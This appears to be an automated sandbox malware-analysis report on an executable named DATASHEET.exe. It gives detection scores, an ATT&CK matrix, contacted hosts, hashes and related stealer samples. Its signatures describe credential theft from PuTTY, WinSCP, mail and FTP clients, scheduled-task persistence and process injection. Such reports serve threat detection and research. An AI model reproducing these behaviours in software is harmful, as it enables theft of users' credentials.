                    Source: Yara matchFile source: 00000008.00000002.1800322328.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1805867621.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1781481952.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: DATASHEET.exe PID: 7336, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7808, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3608, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		311
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Scheduled Task/Job                    		3
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		211
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model21
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets141
                    Virtualization/Sandbox Evasion                    		SSH1
                    Clipboard Data                    		23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559980 Sample: DATASHEET.exe Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 46 smtp.yandex.ru 2->46 48 api.ipify.org 2->48 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Antivirus / Scanner detection for submitted sample 2->58 60 9 other signatures 2->60 8 DATASHEET.exe 7 2->8         started        12 jwvzGqkYNEejno.exe 5 2->12         started        signatures3 process4 file5 38 C:\Users\user\AppData\...\jwvzGqkYNEejno.exe, PE32 8->38 dropped 40 C:\...\jwvzGqkYNEejno.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmp8AFA.tmp, XML 8->42 dropped 44 C:\Users\user\AppData\...\DATASHEET.exe.log, ASCII 8->44 dropped 62 Uses schtasks.exe or at.exe to add and modify task schedules 8->62 64 Writes to foreign memory regions 8->64 66 Allocates memory in foreign processes 8->66 74 2 other signatures 8->74 14 RegSvcs.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        68 Antivirus detection for dropped file 12->68 70 Multi AV Scanner detection for dropped file 12->70 72 Machine Learning detection for dropped file 12->72 24 RegSvcs.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 50 smtp.yandex.ru 77.88.21.158, 49736, 49738, 49837 YANDEXRU Russian Federation 14->50 52 api.ipify.org 172.67.74.152, 443, 49733, 49737 CLOUDFLARENETUS United States 14->52 76 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->76 78 Loading BitLocker PowerShell Module 18->78 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        80 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 24->80 82 Tries to steal Mail credentials (via file / registry access) 24->82 84 Tries to harvest and steal ftp login credentials 24->84 86 2 other signatures 24->86 36 conhost.exe 26->36         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    DATASHEET.exe55%ReversingLabsByteCode-MSIL.Packed.Generic
                    DATASHEET.exe47%VirustotalBrowse
                    DATASHEET.exe100%AviraHEUR/AGEN.1305393
                    DATASHEET.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe100%AviraHEUR/AGEN.1305393
                    C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe55%ReversingLabsWin32.Trojan.Generic

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://www.globalsign.0%Avira URL Cloudsafe
                    http://crl.gl0%Avira URL Cloudsafe
                    http://crl.gl(0%Avira URL Cloudsafe
                    http://crl.globalsign?0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    smtp.yandex.ru
                    		77.88.21.158
                    		truefalse
                      		high
                      api.ipify.org
                      		172.67.74.152
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.apache.org/licenses/LICENSE-2.0DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.comDATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designersGDATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers/?DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bTheDATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://account.dyn.com/DATASHEET.exe, 00000000.00000002.1781481952.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1800322328.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.globalsign.RegSvcs.exe, 0000000D.00000002.4168255024.0000000006696000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fontbureau.com/designers?DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.tiro.comDATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designersDATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.goodfont.co.krDATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.ipify.org/tRegSvcs.exe, 00000008.00000002.1805867621.0000000002F51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.carterandcone.comlDATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.sajatypeworks.comDATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.typography.netDDATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designers/cabarga.htmlNDATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.founder.com.cn/cn/cTheDATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.galapagosdesign.com/staff/dennis.htmDATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://api.ipify.orgDATASHEET.exe, 00000000.00000002.1781481952.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1800322328.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1805867621.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000032DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.founder.com.cn/cnDATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.fontbureau.com/designers/frere-user.htmlDATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://crl.glRegSvcs.exe, 0000000D.00000002.4168255024.0000000006696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://crl.gl(RegSvcs.exe, 0000000D.00000002.4178605679.0000000007F5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.jiyu-kobo.co.jp/DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.galapagosdesign.com/DPleaseDATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.fontbureau.com/designers8DATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.fonts.comDATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.sandoll.co.krDATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.urwpp.deDPleaseDATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.zhongyicts.com.cnDATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://crl.globalsign?RegSvcs.exe, 0000000D.00000002.4168255024.0000000006696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameDATASHEET.exe, 00000000.00000002.1779039940.0000000002D15000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1805867621.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, jwvzGqkYNEejno.exe, 00000009.00000002.1824252057.00000000028E5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.4156832701.00000000032DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.sakkal.comDATASHEET.exe, 00000000.00000002.1788453527.0000000007282000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    77.88.21.158
                                                                                    		smtp.yandex.ruRussian Federation
                                                                                    		13238YANDEXRUfalse
                                                                                    172.67.74.152
                                                                                    		api.ipify.orgUnited States
                                                                                    		13335CLOUDFLARENETUSfalse

                                                                                    General Information

                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1559980
                                                                                    Start date and time:2024-11-21 09:03:30 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 9m 51s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:18
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:DATASHEET.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@19/15@3/2
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 100%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 99%
                                                                                    • Number of executed functions: 180
                                                                                    • Number of non-executed functions: 22
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    03:04:27API Interceptor3x Sleep call for process: DATASHEET.exe modified
                                                                                    03:04:30API Interceptor40x Sleep call for process: powershell.exe modified
                                                                                    03:04:31API Interceptor3x Sleep call for process: jwvzGqkYNEejno.exe modified
                                                                                    03:04:33API Interceptor9428104x Sleep call for process: RegSvcs.exe modified
                                                                                    08:04:30Task SchedulerRun new task: jwvzGqkYNEejno path: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    77.88.21.158datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        0zu73p2YBu.exeGet hashmaliciousChrome Password Stealer, Fox Password Stealer, Opera Password StealerBrowse
                                                                                          BWr9qnCU8X.exeGet hashmaliciousUnknownBrowse
                                                                                            REQUEST FOR OFFER EQUIPMENT ORDER LIST.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              DHL Delivery Invoice.com.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                Transferencias6231.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                  Justificante de pago.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                    Justificante de pago.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                      TRANSFERENCIA BANCARIA.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                        172.67.74.1522b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                                                        • api.ipify.org/
                                                                                                        Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
                                                                                                        • api.ipify.org/
                                                                                                        67065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                        • api.ipify.org/
                                                                                                        Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                                                                                        • api.ipify.org/
                                                                                                        4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
                                                                                                        • api.ipify.org/
                                                                                                        y8tCHz7CwC.binGet hashmaliciousXmrigBrowse
                                                                                                        • api.ipify.org/
                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                        • api.ipify.org/
                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                        • api.ipify.org/
                                                                                                        file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                                                                        • api.ipify.org/
                                                                                                        file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                        • api.ipify.org/

                                                                                                        Domains

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        smtp.yandex.rudatasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 77.88.21.158
                                                                                                        datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 77.88.21.158
                                                                                                        0zu73p2YBu.exeGet hashmaliciousChrome Password Stealer, Fox Password Stealer, Opera Password StealerBrowse
                                                                                                        • 77.88.21.158
                                                                                                        BWr9qnCU8X.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 77.88.21.158
                                                                                                        REQUEST FOR OFFER EQUIPMENT ORDER LIST.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 77.88.21.158
                                                                                                        DHL Delivery Invoice.com.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 77.88.21.158
                                                                                                        Transferencias6231.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                        • 77.88.21.158
                                                                                                        Justificante de pago.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                        • 77.88.21.158
                                                                                                        Justificante de pago.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                        • 77.88.21.158
                                                                                                        TRANSFERENCIA BANCARIA.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                        • 77.88.21.158
                                                                                                        api.ipify.orgdatasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 104.26.13.205
                                                                                                        datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 104.26.13.205
                                                                                                        https://www.canva.com/design/DAGXCpgrUrs/iMtluWgvWDmsrSdUOsij5Q/view?utm_content=DAGXCpgrUrs&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                        • 104.26.12.205
                                                                                                        https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.htmlGet hashmaliciousGabagoolBrowse
                                                                                                        • 104.26.12.205
                                                                                                        https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.comGet hashmaliciousUnknownBrowse
                                                                                                        • 104.26.12.205
                                                                                                        IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                        • 172.67.74.152
                                                                                                        order and drawings_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 104.26.12.205
                                                                                                        vessel details_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 104.26.12.205
                                                                                                        MV BUSAN STAR - calling to discharge about 55,000Mt of aggregates.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 104.26.13.205
                                                                                                        QuarantineMessage.zipGet hashmaliciousUnknownBrowse
                                                                                                        • 172.67.74.152

                                                                                                        ASNs

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        YANDEXRUdatasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 77.88.21.158
                                                                                                        datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 77.88.21.158
                                                                                                        0zu73p2YBu.exeGet hashmaliciousChrome Password Stealer, Fox Password Stealer, Opera Password StealerBrowse
                                                                                                        • 77.88.21.158
                                                                                                        BWr9qnCU8X.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 77.88.21.158
                                                                                                        Unit 2_week 4 2024.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 77.88.21.90
                                                                                                        REQUEST FOR OFFER EQUIPMENT ORDER LIST.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 77.88.21.158
                                                                                                        https://vivantskincare.taplink.wsGet hashmaliciousHTMLPhisherBrowse
                                                                                                        • 93.158.134.119
                                                                                                        DHL Delivery Invoice.com.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 77.88.21.158
                                                                                                        https://sites.google.com/view/we2k-/homeGet hashmaliciousUnknownBrowse
                                                                                                        • 87.250.250.119
                                                                                                        Cursor Commander.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 213.180.204.90
                                                                                                        CLOUDFLARENETUSdatasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 104.26.13.205
                                                                                                        datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 104.26.13.205
                                                                                                        ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 188.114.96.3
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 188.114.96.3
                                                                                                        Secured Audlo_secpod.com_1524702658.htmlGet hashmaliciousUnknownBrowse
                                                                                                        • 104.17.25.14
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 188.114.96.3
                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                        • 188.114.97.3
                                                                                                        https://texasbarcle.com/CLE/AAGateway.asp?lRefID=19203&sURL=https://famezik.com/#Zi5waWNhc3NvJG1hcmxhdGFua2Vycy5ncg==Get hashmaliciousUnknownBrowse
                                                                                                        • 1.1.1.1
                                                                                                        ArchivoNuevo.msiGet hashmaliciousUnknownBrowse
                                                                                                        • 162.159.140.238
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 188.114.97.3

                                                                                                        JA3 Fingerprints

                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        3b5074b1b5d032e5620f69f9f700ff0edatasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 172.67.74.152
                                                                                                        datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                        • 172.67.74.152
                                                                                                        ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        • 172.67.74.152
                                                                                                        PO#8329837372938383839238PDF.exeGet hashmaliciousXWormBrowse
                                                                                                        • 172.67.74.152
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.74.152
                                                                                                        https://ollama.com/Get hashmaliciousUnknownBrowse
                                                                                                        • 172.67.74.152
                                                                                                        z1Tender_procurement_product_order__21_11_2024_.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                        • 172.67.74.152
                                                                                                        ArchivoNuevo.msiGet hashmaliciousUnknownBrowse
                                                                                                        • 172.67.74.152
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                        • 172.67.74.152
                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                        • 172.67.74.152

                                                                                                        Dropped Files

                                                                                                        No context

                                                                                                        Created / dropped Files

                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DATASHEET.exe.log

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\Desktop\DATASHEET.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1216
                                                                                                        Entropy (8bit):5.34331486778365
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                        Malicious:true
                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jwvzGqkYNEejno.exe.log

                                                                                                        Download File
                                                                                                        Process:C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1216
                                                                                                        Entropy (8bit):5.34331486778365
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                        MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                        SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                        SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                        SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                        Malicious:false
